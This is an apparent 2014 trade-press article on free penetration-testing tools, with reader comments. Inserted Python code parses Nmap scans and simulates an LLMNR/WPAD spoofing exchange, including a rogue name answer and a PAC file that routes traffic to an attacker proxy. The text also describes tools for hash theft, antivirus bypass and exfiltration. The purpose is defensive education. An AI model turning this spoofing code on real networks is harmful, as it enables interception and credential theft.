08:10 AM
John H. Sawyer

Tech Insight: Free Tools For Offensive Security

A professional penetration tester offers a look at the latest free and open-source tools available for pen testing and offensive tactics.

There are a lot of excellent offensive security tools available online for free, thanks to open-source licenses and the security professionals who've created tools in an effort to give back to the community. But because they are created by individuals or open-source efforts without the marketing and promotion resources of a vendor, these tools may not be well known in the enterprise.

Two years ago I wrote a Tech Insight on offensive security tools that defenders can leverage to help find vulnerabilities and secure their environments. Today, I want to update that list with some currently available tools that should be included in every offensive and defensive security professional's toolbox.

I truly believe that a security professional focused on defense or offense must understand the tools and techniques used by the other side. Those who defend a network should be aware of the attacks they will face and the ways that attackers avoid detection. To become familiar with these approaches, they should try out some of these same attack methods.

Similarly, those focusing on offense must understand defensive strategies, different types of security controls, and the ways that defenders detect attacks. It's easier to detect an attack or evade detection when you know, firsthand, how the defenses work. If they understand offensive tools, defenders can proactively identify potential threats before they become a more serious problem.

A study of offensive methods also helps security teams find the easily exploitable vulnerabilities and fix them, so that future penetration tests can focus on scenario-based assessments tailored around the organization's specific threat profile.

Before we get into the latest tools specific to the four primary stages of penetration testing -- reconnaissance, mapping, vulnerability detection, and exploitation -- there are a couple of books and websites worth mentioning. The first is the Red Team Field Manual, or RTFM, which is essentially a "cheat sheet" of commands in printed form that can be a handy reference to keep in your backpack. If you like the cheat sheet format, then you'll probably like the RTFM book.

If you prefer a more detailed digital resource, I highly recommend the PwnWiki as an alternative. It can be accessed online or downloaded to your laptop. It has a wider breadth and depth of information compared to RTFM, is well organized, and is more likely to stay current. The PwnWiki is one of those GitHub repositories that I always update prior to going to a pen testing client site -- it ensures that I will have the most up-to-date content in case I need to reference it.

One book that definitely deserves mention is The Hacker Playbook: Practical Guide to Penetration Testing. It's the first book I've come across that has been written from the perspective of an actual penetration tester, and not someone who is simply repeating theory and listing tools with their man pages. While not an extensive guide on all the tools for every situation, it does a good job of taking the reader through the initial prep and on to the final goal.

Now let's look at some of the tools themselves. For the reconnaissance phase, the only tool I'll mention today is recon-ng. There are other tools and websites available, but recon-ng has matured quite a bit in the last year with updates and new modules (e.g., Facebook), making it one of the must-haves in an attacker's (and defender's) toolkit. When used head-to-head with similar tools, I've found that recon-ng discovers more valuable information. There is documentation available on the tool's site, and Tim Tomes's talk at the 2013 DerbyCon conference is a great presentation with live demonstrations.

During the mapping and vulnerability discovery phase, it's common to encounter a large number of web interfaces that need to be manually inspected. This can be time-consuming in a large environment, where you're likely to see 50 to 300+ HTTP servers. To expedite the process, PeepingTom and EyeWitness are two tools that can parse the XML output from Nmap and Nessus, connect to each identified HTTP(S) service, and take a screenshot.

Both tools will generate an HTML report that includes a screenshot, server headers, and a link to the website. It's a quick and easy way to see what each interface looks like, and it provides more detail than simply searching Nmap output for http-title.
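The first step both of those tools perform is the one worth understanding: turning a scan file into a list of web URLs to visit. The script below is an added example (it is not PeepingTom or EyeWitness code) that reads Nmap's `-oX` XML, keeps only hosts that are up and TCP ports that are open, treats any service Nmap names with "http" as a web server, and picks `https` when Nmap reports `tunnel="ssl"` or a name such as `https-alt`. The embedded XML is a constructed sample, not a real scan, and the `.nessus` format is not handled here.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX` output, trimmed to the elements the
# parser reads. Host 10.0.0.30 is down, port 8080 on 10.0.0.20 is filtered,
# and port 443 on 10.0.0.10 is how Nmap reports a TLS-wrapped web server.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="10.0.0.10" addrtype="ipv4"/>
    <hostnames><hostname name="intranet.corp.example" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" method="probed"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="http" tunnel="ssl" method="probed"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.0.0.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="8443"><state state="open"/><service name="https-alt"/></port>
      <port protocol="tcp" portid="8080"><state state="filtered"/><service name="http-proxy"/></port>
      <port protocol="tcp" portid="8000"><state state="open"/><service name="http-alt"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.0.30" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def _scheme_for(name, tunnel):
    """Decide http vs https from Nmap's service name and tunnel attribute."""
    if tunnel == "ssl" or name.startswith("https"):
        return "https"
    return "http"


def http_targets_from_nmap_xml(xml_text):
    """Return the list of URLs a screenshot tool should visit, in scan order.

    Only hosts with status 'up' and TCP ports with state 'open' are kept;
    a port counts as a web service when Nmap's service name contains 'http'.
    Default ports (80 for http, 443 for https) are omitted from the URL.
    """
    root = ET.fromstring(xml_text)
    urls = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")  # fall back to whatever address exists
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            if port.get("protocol") != "tcp":
                continue
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            if svc is None:
                continue
            name = (svc.get("name") or "").lower()
            tunnel = (svc.get("tunnel") or "").lower()
            if "http" not in name:
                continue
            scheme = _scheme_for(name, tunnel)
            portid = int(port.get("portid"))
            default_port = 443 if scheme == "https" else 80
            suffix = "" if portid == default_port else ":%d" % portid
            urls.append("%s://%s%s" % (scheme, addr, suffix))
    return urls


if __name__ == "__main__":
    # Print one URL per line, ready to feed to a screenshot or header-grab step.
    for url in http_targets_from_nmap_xml(SAMPLE_NMAP_XML):
        print(url)
```

Run against a real scan with `nmap -sV -oX scan.xml <targets>` and pass the file contents to `http_targets_from_nmap_xml`. Unprobed ports are classified from Nmap's service table name only, so a TLS listener on an unusual port that Nmap labels plain "http" will be tried as `http://` and will not render; that is exactly why the tools the article describes try both schemes when a fetch fails.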

A common issue found in nearly every pen test is a lack of controls around WPAD. WPAD is short for Web Proxy Auto-Discovery Protocol and is how computers can automatically identify a web proxy and proxy configuration file on a local network. By default, Windows systems are configured to search for hosts named WPAD, making them easily susceptible to name-spoofing and man-in-the-middle attacks. Unless a company is already using a proxy and has disabled the automatic discovery, WPAD is almost always exploitable and has frustrated many a sysadmin.

Previously, I used Metasploit to spoof a WPAD host, serve up a wpad.dat file that pointed to my Burp proxy, and inject malicious code into HTTP traffic going to local machines. But that's all changed with the release of Trustwave SpiderLabs' Responder tool. In addition to collecting password hashes that can be cracked or used as part of an SMB relay attack, Responder has full WPAD spoofing capabilities, the ability to steal cookies, can insert malicious HTML, and can replace EXE files being downloaded with a malicious executable file.
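The reason WPAD is "almost always exploitable" is the name lookup, not the proxy file. When the DNS lookup for wpad fails, a default Windows client falls back to LLMNR (a DNS-format query multicast to 224.0.0.252 on UDP 5355) and then NetBIOS name service, and it accepts the first answer from anyone on the segment. The code below is an added example, not Responder's code, that builds and parses that LLMNR exchange with Python's standard library and then walks through what the victim does with the answer: fetch `http://<answerer>/wpad.dat` and use the proxy it names. The transaction ID, the IP addresses and the proxy port are made-up values; nothing is sent on the wire.

```python
import socket
import struct

# LLMNR (RFC 4795) reuses the DNS message layout. Constants used below:
LLMNR_GROUP = "224.0.0.252"   # multicast group queries are sent to
LLMNR_PORT = 5355
TYPE_A = 1
CLASS_IN = 1
FLAG_QR = 0x8000              # set in responses, clear in queries


def _encode_name(name):
    """DNS wire format: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def _decode_name(data, offset):
    """Inverse of _encode_name; returns (name, offset_after_name)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_llmnr_query(txid, name):
    """What a Windows client multicasts when DNS has no answer for `name`."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_llmnr_query(data):
    """Return the question in a query, or None if `data` is not a single-question query."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", data[:12])
    if flags & FLAG_QR or qdcount != 1:
        return None
    name, off = _decode_name(data, 12)
    qtype, qclass = struct.unpack("!HH", data[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def is_wpad_lookup(name):
    """True for 'wpad' and for 'wpad.<suffix>' forms, case-insensitively."""
    return name.split(".")[0].lower() == "wpad"


def build_llmnr_response(query, answer_ip, ttl=30):
    """The unicast answer a rogue host sends: same ID, question echoed, one A record."""
    header = struct.pack("!HHHHHH", query["id"], FLAG_QR, 1, 1, 0, 0)
    qname = _encode_name(query["name"])
    question = qname + struct.pack("!HH", query["qtype"], query["qclass"])
    rr = qname + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4) + socket.inet_aton(answer_ip)
    return header + question + rr


def parse_llmnr_response(data):
    """Extract the A record from a response built by build_llmnr_response."""
    txid, flags, _, _, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & FLAG_QR:
        return None
    _, off = _decode_name(data, 12)
    off += 4                                  # skip qtype/qclass
    name, off = _decode_name(data, off)
    _, _, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
    off += 10
    return {"id": txid, "name": name, "ttl": ttl, "ip": socket.inet_ntoa(data[off:off + rdlen])}


def wpad_pac(proxy_ip, proxy_port):
    """Minimal wpad.dat: send every URL through the attacker's proxy."""
    return ('function FindProxyForURL(url, host) {\n'
            '  return "PROXY %s:%d";\n'
            '}\n' % (proxy_ip, proxy_port))


def simulate_rogue_wpad(victim_txid, attacker_ip, proxy_port=8080):
    """Walk the exchange Responder automates, entirely in memory."""
    query = build_llmnr_query(victim_txid, "wpad")         # victim -> 224.0.0.252:5355
    question = parse_llmnr_query(query)
    if question is None or not is_wpad_lookup(question["name"]):
        return None                                         # a listener would ignore it
    answer = build_llmnr_response(question, attacker_ip)    # attacker -> victim, unicast
    chosen = parse_llmnr_response(answer)
    if chosen is None or chosen["id"] != victim_txid:       # victim matches the ID, nothing else
        return None
    return {"pac_url": "http://%s/wpad.dat" % chosen["ip"],
            "pac": wpad_pac(attacker_ip, proxy_port)}
```

The exchange shows where the controls belong: an LLMNR listener never has to prove it owns the name, so the fixes are to stop the fallback from happening (disable LLMNR and NetBIOS name resolution by Group Policy), to turn off "Automatically detect settings" where no proxy is used, and, where WPAD is needed, to publish a real `wpad` DNS record so the client never reaches the multicast step.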

Another strong tool in the exploitation category is actually a suite of scripts for Windows PowerShell. PowerSploit's scripts are designed to assist penetration testers with privilege escalation, bypassing antivirus, exfiltration, and code execution. Even in highly sensitive environments locked down with multiple layers of protection -- including antivirus and application whitelisting -- PowerSploit can be used because PowerShell is a legitimate systems administration tool and is rarely restricted.

With these tools -- as well as those I covered in the previous article -- enterprise defenders have a powerful arsenal to identify weak areas in their networks and demonstrate how these vulnerabilities can be exploited. Every tool listed is freely available and open-source. Security teams can easily take advantage of these tools to proactively find and fix potential vulnerabilities before a malicious attacker has a chance to exploit them.

Marilyn Cohodas,
User Rank: Strategist
5/21/2014 | 3:05:58 PM
Thanks for the great interview and live chat, JohnSawyer
For anyone who wants to get some additional insight about what it takes to be a penetration tester, be sure to check out Tim Wilson's Dark Reading radio interview with John: Day In The Life of a Penetration Tester. Lots of really interesting commentary from DR community members in the live chat that followed the broadcast. Here's the link.
User Rank: Moderator
5/21/2014 | 1:15:10 PM
Re: prevalence?
Hi, Kelly.

Thank you for the question. Which clients use the tools? Well, if they're a client, then they've likely been subjected to all the tools as part of the testing we've performed for them. Whether or not they're actually using them is hard to say. I know of several specific examples where clients' security teams perform regular recon looking for compromised credentials, defaced sites, employees posting sensitive information, etc. For that, they use recon-ng.

The rest of the tools I've seen used during specific demonstrations to show other IT groups within the company vulnerabilities and to prompt the other groups to fix those issues. A lot of this depends on the size of the team, how mature the team is (and the company), whether they are stuck in reactive mode or have time for proactive tasks, and other similar team attributes.

I'd like to see more security teams taking advantage of these tools, as I think it would open their eyes to issues they're vulnerable to and help them fix issues before having a 3rd-party tester come in, so the 3rd party's time can be focused on critical, high-risk areas.

User Rank: Moderator
5/21/2014 | 1:00:19 PM
Re: PwnWiki!
Hey, Ed. Thanks for the comment. PwnWiki is a great resource. It's definitely come in handy on a few different pen tests. I need to get my updates sent in sometime soon but just haven't had the time to sort through my notes and get them into a pull request.

Ed Moyle,
User Rank: Apprentice
5/20/2014 | 9:49:54 AM
Just wanted to say thanks for getting this started. Nice to see PwnWiki getting some love.
Kelly Jackson Higgins,
User Rank: Strategist
5/19/2014 | 6:46:46 PM
John, do many of your enterprise clients use these tools today? 
User Rank: Apprentice
5/19/2014 | 1:22:16 PM
Very Helpful!
This article is very helpful, I must say! Keep up the good work!